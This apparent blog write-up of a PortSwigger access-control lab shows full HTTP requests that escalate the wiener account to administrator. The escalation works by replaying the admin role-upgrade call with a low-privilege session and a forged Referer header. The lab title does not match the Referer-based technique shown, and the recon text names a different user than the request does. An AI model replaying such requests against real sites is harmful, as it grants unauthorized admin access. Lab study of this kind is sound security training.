Skip to content

Multistep process with no access control on one step

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab has an admin panel with a flawed multistep process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Point: PRACTITIONER

Recon

The admin panel is reveal to us but when we try to access it, the server return " Admin interface only available if logged in as an administrator"

Try administrator account, when you promote carlos user to admin, the client send the request to the server though endpoint /admin-roles with the username carlos and the action upgrade.

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a9f00d70443245f8265298f00a5002f.web-security-academy.net
Cookie: session=admin_redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0a9f00d70443245f8265298f00a5002f.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Exploit

The page have a mechanism that block us from access the admin panel /admin, and the endpoint /admin-roles also blocked. But the developer has make a critical mistake by not checking session but check the Referer assume that all the account from /admin endpoint is admin.

Using the at the earlier stage, change out the cookies and keep the Referer header we can send the request and complete the labs.

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a9f00d70443245f8265298f00a5002f.web-security-academy.net
Cookie: session=wiener_redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0a9f00d70443245f8265298f00a5002f.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

solved.png